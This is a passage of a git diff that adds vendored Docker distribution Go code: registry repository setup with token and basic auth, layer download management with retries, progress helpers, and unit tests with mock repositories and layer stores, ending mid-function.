+			t.Errorf("[%s] missing expected addition at position %d (%q)", tc.name, i, tc.expectedAdditions[i])
+		}
+		for i := len(tc.expectedAdditions); i < len(ms.added); i++ {
+			t.Errorf("[%s] unexpected metadata addition at position %d (%q)", tc.name, i, ms.added[i])
+		}
+
+		if len(ms.removed) != len(tc.expectedRemovals) {
+			t.Errorf("[%s] got unexpected number of removals: %d != %d", tc.name, len(ms.removed), len(tc.expectedRemovals))
+		}
+		for i := 0; i < len(ms.removed) && i < len(tc.expectedRemovals); i++ {
+			if ms.removed[i] != tc.expectedRemovals[i] {
+				t.Errorf("[%s] removed metadata at %d does not match expected: %q != %q", tc.name, i, ms.removed[i], tc.expectedRemovals[i])
+			}
+		}
+		for i := len(ms.removed); i < len(tc.expectedRemovals); i++ {
+			t.Errorf("[%s] missing expected removal at position %d (%q)", tc.name, i, tc.expectedRemovals[i])
+		}
+		for i := len(tc.expectedRemovals); i < len(ms.removed); i++ {
+			t.Errorf("[%s] removed unexpected metadata at position %d (%q)", tc.name, i, ms.removed[i])
+		}
+	}
+}
+
+func taggedMetadata(key string, dgst string, sourceRepo string) metadata.V2Metadata {
+	meta := metadata.V2Metadata{
+		Digest:           digest.Digest(dgst),
+		SourceRepository: sourceRepo,
+	}
+
+	meta.HMAC = metadata.ComputeV2MetadataHMAC([]byte(key), &meta)
+	return meta
+}
+
+type mockRepo struct {
+	t        *testing.T
+	errors   map[digest.Digest]error
+	blobs    map[digest.Digest]distribution.Descriptor
+	requests []string
+}
+
+var _ distribution.Repository = &mockRepo{}
+
+func (m *mockRepo) Named() distreference.Named {
+	m.t.Fatalf("Named() not implemented")
+	return nil
+}
+func (m *mockRepo) Manifests(ctc context.Context, options ...distribution.ManifestServiceOption) (distribution.ManifestService, error) {
+	m.t.Fatalf("Manifests() not implemented")
+	return nil, nil
+}
+func (m *mockRepo) Tags(ctc context.Context) distribution.TagService {
+	m.t.Fatalf("Tags() not implemented")
+	return nil
+}
+func (m *mockRepo) Blobs(ctx context.Context) distribution.BlobStore {
+	return &mockBlobStore{
+		repo: m,
+	}
+}
+
+type mockBlobStore struct {
+	repo *mockRepo
+}
+
+var _ distribution.BlobStore = &mockBlobStore{}
+
+func (m *mockBlobStore) Stat(ctx context.Context, dgst digest.Digest) (distribution.Descriptor, error) {
+	m.repo.requests = append(m.repo.requests, dgst.String())
+	if err, exists := m.repo.errors[dgst]; exists {
+		return distribution.Descriptor{}, err
+	}
+	if desc, exists := m.repo.blobs[dgst]; exists {
+		return desc, nil
+	}
+	return distribution.Descriptor{}, distribution.ErrBlobUnknown
+}
+func (m *mockBlobStore) Get(ctx context.Context, dgst digest.Digest) ([]byte, error) {
+	m.repo.t.Fatal("Get() not implemented")
+	return nil, nil
+}
+
+func (m *mockBlobStore) Open(ctx context.Context, dgst digest.Digest) (distribution.ReadSeekCloser, error) {
+	m.repo.t.Fatal("Open() not implemented")
+	return nil, nil
+}
+
+func (m *mockBlobStore) Put(ctx context.Context, mediaType string, p []byte) (distribution.Descriptor, error) {
+	m.repo.t.Fatal("Put() not implemented")
+	return distribution.Descriptor{}, nil
+}
+
+func (m *mockBlobStore) Create(ctx context.Context, options ...distribution.BlobCreateOption) (distribution.BlobWriter, error) {
+	m.repo.t.Fatal("Create() not implemented")
+	return nil, nil
+}
+func (m *mockBlobStore) Resume(ctx context.Context, id string) (distribution.BlobWriter, error) {
+	m.repo.t.Fatal("Resume() not implemented")
+	return nil, nil
+}
+func (m *mockBlobStore) Delete(ctx context.Context, dgst digest.Digest) error {
+	m.repo.t.Fatal("Delete() not implemented")
+	return nil
+}
+func (m *mockBlobStore) ServeBlob(ctx context.Context, w http.ResponseWriter, r *http.Request, dgst digest.Digest) error {
+	m.repo.t.Fatalf("ServeBlob() not implemented")
+	return nil
+}
+
+type mockV2MetadataService struct {
+	added   []metadata.V2Metadata
+	removed []metadata.V2Metadata
+}
+
+var _ metadata.V2MetadataService = &mockV2MetadataService{}
+
+func (*mockV2MetadataService) GetMetadata(diffID layer.DiffID) ([]metadata.V2Metadata, error) {
+	return nil, nil
+}
+func (*mockV2MetadataService) GetDiffID(dgst digest.Digest) (layer.DiffID, error) {
+	return "", nil
+}
+func (m *mockV2MetadataService) Add(diffID layer.DiffID, metadata metadata.V2Metadata) error {
+	m.added = append(m.added, metadata)
+	return nil
+}
+func (m *mockV2MetadataService) TagAndAdd(diffID layer.DiffID, hmacKey []byte, meta metadata.V2Metadata) error {
+	meta.HMAC = metadata.ComputeV2MetadataHMAC(hmacKey, &meta)
+	m.Add(diffID, meta)
+	return nil
+}
+func (m *mockV2MetadataService) Remove(metadata metadata.V2Metadata) error {
+	m.removed = append(m.removed, metadata)
+	return nil
+}
+
+type progressSink struct {
+	t *testing.T
+}
+
+func (s *progressSink) WriteProgress(p progress.Progress) error {
+	s.t.Logf("progress update: %#+v", p)
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/distribution/registry.go b/vendor/github.com/docker/docker/distribution/registry.go
new file mode 100644
index 0000000000..95e181ded8
--- /dev/null
+++ b/vendor/github.com/docker/docker/distribution/registry.go
@@ -0,0 +1,156 @@
+package distribution
+
+import (
+	"fmt"
+	"net"
+	"net/http"
+	"time"
+
+	"github.com/docker/distribution"
+	"github.com/docker/distribution/manifest/schema2"
+	distreference "github.com/docker/distribution/reference"
+	"github.com/docker/distribution/registry/client"
+	"github.com/docker/distribution/registry/client/auth"
+	"github.com/docker/distribution/registry/client/transport"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/dockerversion"
+	"github.com/docker/docker/registry"
+	"github.com/docker/go-connections/sockets"
+	"golang.org/x/net/context"
+)
+
+// ImageTypes represents the schema2 config types for images
+var ImageTypes = []string{
+	schema2.MediaTypeImageConfig,
+	// Handle unexpected values from https://github.com/docker/distribution/issues/1621
+	// (see also https://github.com/docker/docker/issues/22378,
+	// https://github.com/docker/docker/issues/30083)
+	"application/octet-stream",
+	"application/json",
+	"text/html",
+	// Treat defaulted values as images, newer types cannot be implied
+	"",
+}
+
+// PluginTypes represents the schema2 config types for plugins
+var PluginTypes = []string{
+	schema2.MediaTypePluginConfig,
+}
+
+var mediaTypeClasses map[string]string
+
+func init() {
+	// initialize media type classes with all know types for
+	// plugin
+	mediaTypeClasses = map[string]string{}
+	for _, t := range ImageTypes {
+		mediaTypeClasses[t] = "image"
+	}
+	for _, t := range PluginTypes {
+		mediaTypeClasses[t] = "plugin"
+	}
+}
+
+// NewV2Repository returns a repository (v2 only). It creates an HTTP transport
+// providing timeout settings and authentication support, and also verifies the
+// remote API version.
+func NewV2Repository(ctx context.Context, repoInfo *registry.RepositoryInfo, endpoint registry.APIEndpoint, metaHeaders http.Header, authConfig *types.AuthConfig, actions ...string) (repo distribution.Repository, foundVersion bool, err error) {
+	repoName := repoInfo.FullName()
+	// If endpoint does not support CanonicalName, use the RemoteName instead
+	if endpoint.TrimHostname {
+		repoName = repoInfo.RemoteName()
+	}
+
+	direct := &net.Dialer{
+		Timeout:   30 * time.Second,
+		KeepAlive: 30 * time.Second,
+		DualStack: true,
+	}
+
+	// TODO(dmcgowan): Call close idle connections when complete, use keep alive
+	base := &http.Transport{
+		Proxy:               http.ProxyFromEnvironment,
+		Dial:                direct.Dial,
+		TLSHandshakeTimeout: 10 * time.Second,
+		TLSClientConfig:     endpoint.TLSConfig,
+		// TODO(dmcgowan): Call close idle connections when complete and use keep alive
+		DisableKeepAlives: true,
+	}
+
+	proxyDialer, err := sockets.DialerFromEnvironment(direct)
+	if err == nil {
+		base.Dial = proxyDialer.Dial
+	}
+
+	modifiers := registry.DockerHeaders(dockerversion.DockerUserAgent(ctx), metaHeaders)
+	authTransport := transport.NewTransport(base, modifiers...)
+
+	challengeManager, foundVersion, err := registry.PingV2Registry(endpoint.URL, authTransport)
+	if err != nil {
+		transportOK := false
+		if responseErr, ok := err.(registry.PingResponseError); ok {
+			transportOK = true
+			err = responseErr.Err
+		}
+		return nil, foundVersion, fallbackError{
+			err:         err,
+			confirmedV2: foundVersion,
+			transportOK: transportOK,
+		}
+	}
+
+	if authConfig.RegistryToken != "" {
+		passThruTokenHandler := &existingTokenHandler{token: authConfig.RegistryToken}
+		modifiers = append(modifiers, auth.NewAuthorizer(challengeManager, passThruTokenHandler))
+	} else {
+		scope := auth.RepositoryScope{
+			Repository: repoName,
+			Actions:    actions,
+			Class:      repoInfo.Class,
+		}
+
+		creds := registry.NewStaticCredentialStore(authConfig)
+		tokenHandlerOptions := auth.TokenHandlerOptions{
+			Transport:   authTransport,
+			Credentials: creds,
+			Scopes:      []auth.Scope{scope},
+			ClientID:    registry.AuthClientID,
+		}
+		tokenHandler := auth.NewTokenHandlerWithOptions(tokenHandlerOptions)
+		basicHandler := auth.NewBasicHandler(creds)
+		modifiers = append(modifiers, auth.NewAuthorizer(challengeManager, tokenHandler, basicHandler))
+	}
+	tr := transport.NewTransport(base, modifiers...)
+
+	repoNameRef, err := distreference.ParseNamed(repoName)
+	if err != nil {
+		return nil, foundVersion, fallbackError{
+			err:         err,
+			confirmedV2: foundVersion,
+			transportOK: true,
+		}
+	}
+
+	repo, err = client.NewRepository(ctx, repoNameRef, endpoint.URL.String(), tr)
+	if err != nil {
+		err = fallbackError{
+			err:         err,
+			confirmedV2: foundVersion,
+			transportOK: true,
+		}
+	}
+	return
+}
+
+type existingTokenHandler struct {
+	token string
+}
+
+func (th *existingTokenHandler) Scheme() string {
+	return "bearer"
+}
+
+func (th *existingTokenHandler) AuthorizeRequest(req *http.Request, params map[string]string) error {
+	req.Header.Set("Authorization", fmt.Sprintf("Bearer %s", th.token))
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/distribution/registry_unit_test.go b/vendor/github.com/docker/docker/distribution/registry_unit_test.go
new file mode 100644
index 0000000000..406de34915
--- /dev/null
+++ b/vendor/github.com/docker/docker/distribution/registry_unit_test.go
@@ -0,0 +1,136 @@
+package distribution
+
+import (
+	"net/http"
+	"net/http/httptest"
+	"net/url"
+	"os"
+	"strings"
+	"testing"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/api/types"
+	registrytypes "github.com/docker/docker/api/types/registry"
+	"github.com/docker/docker/reference"
+	"github.com/docker/docker/registry"
+	"github.com/docker/docker/utils"
+	"golang.org/x/net/context"
+)
+
+const secretRegistryToken = "mysecrettoken"
+
+type tokenPassThruHandler struct {
+	reached       bool
+	gotToken      bool
+	shouldSend401 func(url string) bool
+}
+
+func (h *tokenPassThruHandler) ServeHTTP(w http.ResponseWriter, r *http.Request) {
+	h.reached = true
+	if strings.Contains(r.Header.Get("Authorization"), secretRegistryToken) {
+		logrus.Debug("Detected registry token in auth header")
+		h.gotToken = true
+	}
+	if h.shouldSend401 == nil || h.shouldSend401(r.RequestURI) {
+		w.Header().Set("WWW-Authenticate", `Bearer realm="foorealm"`)
+		w.WriteHeader(401)
+	}
+}
+
+func testTokenPassThru(t *testing.T, ts *httptest.Server) {
+	tmp, err := utils.TestDirectory("")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmp)
+
+	uri, err := url.Parse(ts.URL)
+	if err != nil {
+		t.Fatalf("could not parse url from test server: %v", err)
+	}
+
+	endpoint := registry.APIEndpoint{
+		Mirror:       false,
+		URL:          uri,
+		Version:      2,
+		Official:     false,
+		TrimHostname: false,
+		TLSConfig:    nil,
+		//VersionHeader: "verheader",
+	}
+	n, _ := reference.ParseNamed("testremotename")
+	repoInfo := &registry.RepositoryInfo{
+		Named: n,
+		Index: &registrytypes.IndexInfo{
+			Name:     "testrepo",
+			Mirrors:  nil,
+			Secure:   false,
+			Official: false,
+		},
+		Official: false,
+	}
+	imagePullConfig := &ImagePullConfig{
+		Config: Config{
+			MetaHeaders: http.Header{},
+			AuthConfig: &types.AuthConfig{
+				RegistryToken: secretRegistryToken,
+			},
+		},
+		Schema2Types: ImageTypes,
+	}
+	puller, err := newPuller(endpoint, repoInfo, imagePullConfig)
+	if err != nil {
+		t.Fatal(err)
+	}
+	p := puller.(*v2Puller)
+	ctx := context.Background()
+	p.repo, _, err = NewV2Repository(ctx, p.repoInfo, p.endpoint, p.config.MetaHeaders, p.config.AuthConfig, "pull")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	logrus.Debug("About to pull")
+	// We expect it to fail, since we haven't mock'd the full registry exchange in our handler above
+	tag, _ := reference.WithTag(n, "tag_goes_here")
+	_ = p.pullV2Repository(ctx, tag)
+}
+
+func TestTokenPassThru(t *testing.T) {
+	handler := &tokenPassThruHandler{shouldSend401: func(url string) bool { return url == "/v2/" }}
+	ts := httptest.NewServer(handler)
+	defer ts.Close()
+
+	testTokenPassThru(t, ts)
+
+	if !handler.reached {
+		t.Fatal("Handler not reached")
+	}
+	if !handler.gotToken {
+		t.Fatal("Failed to receive registry token")
+	}
+}
+
+func TestTokenPassThruDifferentHost(t *testing.T) {
+	handler := new(tokenPassThruHandler)
+	ts := httptest.NewServer(handler)
+	defer ts.Close()
+
+	tsredirect := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		if r.RequestURI == "/v2/" {
+			w.Header().Set("WWW-Authenticate", `Bearer realm="foorealm"`)
+			w.WriteHeader(401)
+			return
+		}
+		http.Redirect(w, r, ts.URL+r.URL.Path, http.StatusMovedPermanently)
+	}))
+	defer tsredirect.Close()
+
+	testTokenPassThru(t, tsredirect)
+
+	if !handler.reached {
+		t.Fatal("Handler not reached")
+	}
+	if handler.gotToken {
+		t.Fatal("Redirect should not forward Authorization header to another host")
+	}
+}
diff --git a/vendor/github.com/docker/docker/distribution/utils/progress.go b/vendor/github.com/docker/docker/distribution/utils/progress.go
new file mode 100644
index 0000000000..ef8ecc89f6
--- /dev/null
+++ b/vendor/github.com/docker/docker/distribution/utils/progress.go
@@ -0,0 +1,44 @@
+package utils
+
+import (
+	"io"
+	"net"
+	"os"
+	"syscall"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/pkg/progress"
+	"github.com/docker/docker/pkg/streamformatter"
+)
+
+// WriteDistributionProgress is a helper for writing progress from chan to JSON
+// stream with an optional cancel function.
+func WriteDistributionProgress(cancelFunc func(), outStream io.Writer, progressChan <-chan progress.Progress) {
+	progressOutput := streamformatter.NewJSONStreamFormatter().NewProgressOutput(outStream, false)
+	operationCancelled := false
+
+	for prog := range progressChan {
+		if err := progressOutput.WriteProgress(prog); err != nil && !operationCancelled {
+			// don't log broken pipe errors as this is the normal case when a client aborts
+			if isBrokenPipe(err) {
+				logrus.Info("Pull session cancelled")
+			} else {
+				logrus.Errorf("error writing progress to client: %v", err)
+			}
+			cancelFunc()
+			operationCancelled = true
+			// Don't return, because we need to continue draining
+			// progressChan until it's closed to avoid a deadlock.
+		}
+	}
+}
+
+func isBrokenPipe(e error) bool {
+	if netErr, ok := e.(*net.OpError); ok {
+		e = netErr.Err
+		if sysErr, ok := netErr.Err.(*os.SyscallError); ok {
+			e = sysErr.Err
+		}
+	}
+	return e == syscall.EPIPE
+}
diff --git a/vendor/github.com/docker/docker/distribution/xfer/download.go b/vendor/github.com/docker/docker/distribution/xfer/download.go
new file mode 100644
index 0000000000..7545342212
--- /dev/null
+++ b/vendor/github.com/docker/docker/distribution/xfer/download.go
@@ -0,0 +1,452 @@
+package xfer
+
+import (
+	"errors"
+	"fmt"
+	"io"
+	"time"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/distribution"
+	"github.com/docker/docker/image"
+	"github.com/docker/docker/layer"
+	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/docker/pkg/ioutils"
+	"github.com/docker/docker/pkg/progress"
+	"golang.org/x/net/context"
+)
+
+const maxDownloadAttempts = 5
+
+// LayerDownloadManager figures out which layers need to be downloaded, then
+// registers and downloads those, taking into account dependencies between
+// layers.
+type LayerDownloadManager struct {
+	layerStore layer.Store
+	tm         TransferManager
+}
+
+// SetConcurrency set the max concurrent downloads for each pull
+func (ldm *LayerDownloadManager) SetConcurrency(concurrency int) {
+	ldm.tm.SetConcurrency(concurrency)
+}
+
+// NewLayerDownloadManager returns a new LayerDownloadManager.
+func NewLayerDownloadManager(layerStore layer.Store, concurrencyLimit int) *LayerDownloadManager {
+	return &LayerDownloadManager{
+		layerStore: layerStore,
+		tm:         NewTransferManager(concurrencyLimit),
+	}
+}
+
+type downloadTransfer struct {
+	Transfer
+
+	layerStore layer.Store
+	layer      layer.Layer
+	err        error
+}
+
+// result returns the layer resulting from the download, if the download
+// and registration were successful.
+func (d *downloadTransfer) result() (layer.Layer, error) {
+	return d.layer, d.err
+}
+
+// A DownloadDescriptor references a layer that may need to be downloaded.
+type DownloadDescriptor interface {
+	// Key returns the key used to deduplicate downloads.
+	Key() string
+	// ID returns the ID for display purposes.
+	ID() string
+	// DiffID should return the DiffID for this layer, or an error
+	// if it is unknown (for example, if it has not been downloaded
+	// before).
+	DiffID() (layer.DiffID, error)
+	// Download is called to perform the download.
+	Download(ctx context.Context, progressOutput progress.Output) (io.ReadCloser, int64, error)
+	// Close is called when the download manager is finished with this
+	// descriptor and will not call Download again or read from the reader
+	// that Download returned.
+	Close()
+}
+
+// DownloadDescriptorWithRegistered is a DownloadDescriptor that has an
+// additional Registered method which gets called after a downloaded layer is
+// registered. This allows the user of the download manager to know the DiffID
+// of each registered layer. This method is called if a cast to
+// DownloadDescriptorWithRegistered is successful.
+type DownloadDescriptorWithRegistered interface {
+	DownloadDescriptor
+	Registered(diffID layer.DiffID)
+}
+
+// Download is a blocking function which ensures the requested layers are
+// present in the layer store. It uses the string returned by the Key method to
+// deduplicate downloads. If a given layer is not already known to present in
+// the layer store, and the key is not used by an in-progress download, the
+// Download method is called to get the layer tar data. Layers are then
+// registered in the appropriate order.  The caller must call the returned
+// release function once it is is done with the returned RootFS object.
+func (ldm *LayerDownloadManager) Download(ctx context.Context, initialRootFS image.RootFS, layers []DownloadDescriptor, progressOutput progress.Output) (image.RootFS, func(), error) {
+	var (
+		topLayer       layer.Layer
+		topDownload    *downloadTransfer
+		watcher        *Watcher
+		missingLayer   bool
+		transferKey    = ""
+		downloadsByKey = make(map[string]*downloadTransfer)
+	)
+
+	rootFS := initialRootFS
+	for _, descriptor := range layers {
+		key := descriptor.Key()
+		transferKey += key
+
+		if !missingLayer {
+			missingLayer = true
+			diffID, err := descriptor.DiffID()
+			if err == nil {
+				getRootFS := rootFS
+				getRootFS.Append(diffID)
+				l, err := ldm.layerStore.Get(getRootFS.ChainID())
+				if err == nil {
+					// Layer already exists.
+					logrus.Debugf("Layer already exists: %s", descriptor.ID())
+					progress.Update(progressOutput, descriptor.ID(), "Already exists")
+					if topLayer != nil {
+						layer.ReleaseAndLog(ldm.layerStore, topLayer)
+					}
+					topLayer = l
+					missingLayer = false
+					rootFS.Append(diffID)
+					continue
+				}
+			}
+		}
+
+		// Does this layer have the same data as a previous layer in
+		// the stack? If so, avoid downloading it more than once.
+		var topDownloadUncasted Transfer
+		if existingDownload, ok := downloadsByKey[key]; ok {
+			xferFunc := ldm.makeDownloadFuncFromDownload(descriptor, existingDownload, topDownload)
+			defer topDownload.Transfer.Release(watcher)
+			topDownloadUncasted, watcher = ldm.tm.Transfer(transferKey, xferFunc, progressOutput)
+			topDownload = topDownloadUncasted.(*downloadTransfer)
+			continue
+		}
+
+		// Layer is not known to exist - download and register it.
+		progress.Update(progressOutput, descriptor.ID(), "Pulling fs layer")
+
+		var xferFunc DoFunc
+		if topDownload != nil {
+			xferFunc = ldm.makeDownloadFunc(descriptor, "", topDownload)
+			defer topDownload.Transfer.Release(watcher)
+		} else {
+			xferFunc = ldm.makeDownloadFunc(descriptor, rootFS.ChainID(), nil)
+		}
+		topDownloadUncasted, watcher = ldm.tm.Transfer(transferKey, xferFunc, progressOutput)
+		topDownload = topDownloadUncasted.(*downloadTransfer)
+		downloadsByKey[key] = topDownload
+	}
+
+	if topDownload == nil {
+		return rootFS, func() {
+			if topLayer != nil {
+				layer.ReleaseAndLog(ldm.layerStore, topLayer)
+			}
+		}, nil
+	}
+
+	// Won't be using the list built up so far - will generate it
+	// from downloaded layers instead.
+	rootFS.DiffIDs = []layer.DiffID{}
+
+	defer func() {
+		if topLayer != nil {
+			layer.ReleaseAndLog(ldm.layerStore, topLayer)
+		}
+	}()
+
+	select {
+	case <-ctx.Done():
+		topDownload.Transfer.Release(watcher)
+		return rootFS, func() {}, ctx.Err()
+	case <-topDownload.Done():
+		break
+	}
+
+	l, err := topDownload.result()
+	if err != nil {
+		topDownload.Transfer.Release(watcher)
+		return rootFS, func() {}, err
+	}
+
+	// Must do this exactly len(layers) times, so we don't include the
+	// base layer on Windows.
+	for range layers {
+		if l == nil {
+			topDownload.Transfer.Release(watcher)
+			return rootFS, func() {}, errors.New("internal error: too few parent layers")
+		}
+		rootFS.DiffIDs = append([]layer.DiffID{l.DiffID()}, rootFS.DiffIDs...)
+		l = l.Parent()
+	}
+	return rootFS, func() { topDownload.Transfer.Release(watcher) }, err
+}
+
+// makeDownloadFunc returns a function that performs the layer download and
+// registration. If parentDownload is non-nil, it waits for that download to
+// complete before the registration step, and registers the downloaded data
+// on top of parentDownload's resulting layer. Otherwise, it registers the
+// layer on top of the ChainID given by parentLayer.
+func (ldm *LayerDownloadManager) makeDownloadFunc(descriptor DownloadDescriptor, parentLayer layer.ChainID, parentDownload *downloadTransfer) DoFunc {
+	return func(progressChan chan<- progress.Progress, start <-chan struct{}, inactive chan<- struct{}) Transfer {
+		d := &downloadTransfer{
+			Transfer:   NewTransfer(),
+			layerStore: ldm.layerStore,
+		}
+
+		go func() {
+			defer func() {
+				close(progressChan)
+			}()
+
+			progressOutput := progress.ChanOutput(progressChan)
+
+			select {
+			case <-start:
+			default:
+				progress.Update(progressOutput, descriptor.ID(), "Waiting")
+				<-start
+			}
+
+			if parentDownload != nil {
+				// Did the parent download already fail or get
+				// cancelled?
+				select {
+				case <-parentDownload.Done():
+					_, err := parentDownload.result()
+					if err != nil {
+						d.err = err
+						return
+					}
+				default:
+				}
+			}
+
+			var (
+				downloadReader io.ReadCloser
+				size           int64
+				err            error
+				retries        int
+			)
+
+			defer descriptor.Close()
+
+			for {
+				downloadReader, size, err = descriptor.Download(d.Transfer.Context(), progressOutput)
+				if err == nil {
+					break
+				}
+
+				// If an error was returned because the context
+				// was cancelled, we shouldn't retry.
+				select {
+				case <-d.Transfer.Context().Done():
+					d.err = err
+					return
+				default:
+				}
+
+				retries++
+				if _, isDNR := err.(DoNotRetry); isDNR || retries == maxDownloadAttempts {
+					logrus.Errorf("Download failed: %v", err)
+					d.err = err
+					return
+				}
+
+				logrus.Errorf("Download failed, retrying: %v", err)
+				delay := retries * 5
+				ticker := time.NewTicker(time.Second)
+
+			selectLoop:
+				for {
+					progress.Updatef(progressOutput, descriptor.ID(), "Retrying in %d second%s", delay, (map[bool]string{true: "s"})[delay != 1])
+					select {
+					case <-ticker.C:
+						delay--
+						if delay == 0 {
+							ticker.Stop()
+							break selectLoop
+						}
+					case <-d.Transfer.Context().Done():
+						ticker.Stop()
+						d.err = errors.New("download cancelled during retry delay")
+						return
+					}
+
+				}
+			}
+
+			close(inactive)
+
+			if parentDownload != nil {
+				select {
+				case <-d.Transfer.Context().Done():
+					d.err = errors.New("layer registration cancelled")
+					downloadReader.Close()
+					return
+				case <-parentDownload.Done():
+				}
+
+				l, err := parentDownload.result()
+				if err != nil {
+					d.err = err
+					downloadReader.Close()
+					return
+				}
+				parentLayer = l.ChainID()
+			}
+
+			reader := progress.NewProgressReader(ioutils.NewCancelReadCloser(d.Transfer.Context(), downloadReader), progressOutput, size, descriptor.ID(), "Extracting")
+			defer reader.Close()
+
+			inflatedLayerData, err := archive.DecompressStream(reader)
+			if err != nil {
+				d.err = fmt.Errorf("could not get decompression stream: %v", err)
+				return
+			}
+
+			var src distribution.Descriptor
+			if fs, ok := descriptor.(distribution.Describable); ok {
+				src = fs.Descriptor()
+			}
+			if ds, ok := d.layerStore.(layer.DescribableStore); ok {
+				d.layer, err = ds.RegisterWithDescriptor(inflatedLayerData, parentLayer, src)
+			} else {
+				d.layer, err = d.layerStore.Register(inflatedLayerData, parentLayer)
+			}
+			if err != nil {
+				select {
+				case <-d.Transfer.Context().Done():
+					d.err = errors.New("layer registration cancelled")
+				default:
+					d.err = fmt.Errorf("failed to register layer: %v", err)
+				}
+				return
+			}
+
+			progress.Update(progressOutput, descriptor.ID(), "Pull complete")
+			withRegistered, hasRegistered := descriptor.(DownloadDescriptorWithRegistered)
+			if hasRegistered {
+				withRegistered.Registered(d.layer.DiffID())
+			}
+
+			// Doesn't actually need to be its own goroutine, but
+			// done like this so we can defer close(c).
+			go func() {
+				<-d.Transfer.Released()
+				if d.layer != nil {
+					layer.ReleaseAndLog(d.layerStore, d.layer)
+				}
+			}()
+		}()
+
+		return d
+	}
+}
+
+// makeDownloadFuncFromDownload returns a function that performs the layer
+// registration when the layer data is coming from an existing download. It
+// waits for sourceDownload and parentDownload to complete, and then
+// reregisters the data from sourceDownload's top layer on top of
+// parentDownload. This function does not log progress output because it would
+// interfere with the progress reporting for sourceDownload, which has the same
+// Key.
+func (ldm *LayerDownloadManager) makeDownloadFuncFromDownload(descriptor DownloadDescriptor, sourceDownload *downloadTransfer, parentDownload *downloadTransfer) DoFunc {
+	return func(progressChan chan<- progress.Progress, start <-chan struct{}, inactive chan<- struct{}) Transfer {
+		d := &downloadTransfer{
+			Transfer:   NewTransfer(),
+			layerStore: ldm.layerStore,
+		}
+
+		go func() {
+			defer func() {
+				close(progressChan)
+			}()
+
+			<-start
+
+			close(inactive)
+
+			select {
+			case <-d.Transfer.Context().Done():
+				d.err = errors.New("layer registration cancelled")
+				return
+			case <-parentDownload.Done():
+			}
+
+			l, err := parentDownload.result()
+			if err != nil {
+				d.err = err
+				return
+			}
+			parentLayer := l.ChainID()
+
+			// sourceDownload should have already finished if
+			// parentDownload finished, but wait for it explicitly
+			// to be sure.
+			select {
+			case <-d.Transfer.Context().Done():
+				d.err = errors.New("layer registration cancelled")
+				return
+			case <-sourceDownload.Done():
+			}
+
+			l, err = sourceDownload.result()
+			if err != nil {
+				d.err = err
+				return
+			}
+
+			layerReader, err := l.TarStream()
+			if err != nil {
+				d.err = err
+				return
+			}
+			defer layerReader.Close()
+
+			var src distribution.Descriptor
+			if fs, ok := l.(distribution.Describable); ok {
+				src = fs.Descriptor()
+			}
+			if ds, ok := d.layerStore.(layer.DescribableStore); ok {
+				d.layer, err = ds.RegisterWithDescriptor(layerReader, parentLayer, src)
+			} else {
+				d.layer, err = d.layerStore.Register(layerReader, parentLayer)
+			}
+			if err != nil {
+				d.err = fmt.Errorf("failed to register layer: %v", err)
+				return
+			}
+
+			withRegistered, hasRegistered := descriptor.(DownloadDescriptorWithRegistered)
+			if hasRegistered {
+				withRegistered.Registered(d.layer.DiffID())
+			}
+
+			// Doesn't actually need to be its own goroutine, but
+			// done like this so we can defer close(c).
+			go func() {
+				<-d.Transfer.Released()
+				if d.layer != nil {
+					layer.ReleaseAndLog(d.layerStore, d.layer)
+				}
+			}()
+		}()
+
+		return d
+	}
+}
diff --git a/vendor/github.com/docker/docker/distribution/xfer/download_test.go b/vendor/github.com/docker/docker/distribution/xfer/download_test.go
new file mode 100644
index 0000000000..bc20e1e7ec
--- /dev/null
+++ b/vendor/github.com/docker/docker/distribution/xfer/download_test.go
@@ -0,0 +1,356 @@
+package xfer
+
+import (
+	"bytes"
+	"errors"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"runtime"
+	"sync/atomic"
+	"testing"
+	"time"
+
+	"github.com/docker/distribution"
+	"github.com/docker/distribution/digest"
+	"github.com/docker/docker/image"
+	"github.com/docker/docker/layer"
+	"github.com/docker/docker/pkg/progress"
+	"golang.org/x/net/context"
+)
+
+const maxDownloadConcurrency = 3
+
+type mockLayer struct {
+	layerData bytes.Buffer
+	diffID    layer.DiffID
+	chainID   layer.ChainID
+	parent    layer.Layer
+}
+
+func (ml *mockLayer) TarStream() (io.ReadCloser, error) {
+	return ioutil.NopCloser(bytes.NewBuffer(ml.layerData.Bytes())), nil
+}
+
+func (ml *mockLayer) TarStreamFrom(layer.ChainID) (io.ReadCloser, error) {
+	return nil, fmt.Errorf("not implemented")
+}
+
+func (ml *mockLayer) ChainID() layer.ChainID {
+	return ml.chainID
+}
+
+func (ml *mockLayer) DiffID() layer.DiffID {
+	return ml.diffID
+}
+
+func (ml *mockLayer) Parent() layer.Layer {
+	return ml.parent
+}
+
+func (ml *mockLayer) Size() (size int64, err error) {
+	return 0, nil
+}
+
+func (ml *mockLayer) DiffSize() (size int64, err error) {
+	return 0, nil
+}
+
+func (ml *mockLayer) Metadata() (map[string]string, error) {
+	return make(map[string]string), nil
+}
+
+type mockLayerStore struct {
+	layers map[layer.ChainID]*mockLayer
+}
+
+func createChainIDFromParent(parent layer.ChainID, dgsts ...layer.DiffID) layer.ChainID {
+	if len(dgsts) == 0 {
+		return parent
+	}
+	if parent == "" {
+		return createChainIDFromParent(layer.ChainID(dgsts[0]), dgsts[1:]...)
+	}
+	// H = "H(n-1) SHA256(n)"
+	dgst := digest.FromBytes([]byte(string(parent) + " " + string(dgsts[0])))
+	return createChainIDFromParent(layer.ChainID(dgst), dgsts[1:]...)
+}
+
+func (ls *mockLayerStore) Map() map[layer.ChainID]layer.Layer {
+	layers := map[layer.ChainID]layer.Layer{}
+
+	for k, v := range ls.layers {
+		layers[k] = v
+	}
+
+	return layers
+}
+
+func (ls *mockLayerStore) Register(reader io.Reader, parentID layer.ChainID) (layer.Layer, error) {
+	return ls.RegisterWithDescriptor(reader, parentID, distribution.Descriptor{})
+}
+
+func (ls *mockLayerStore) RegisterWithDescriptor(reader io.Reader, parentID layer.ChainID, _ distribution.Descriptor) (layer.Layer, error) {
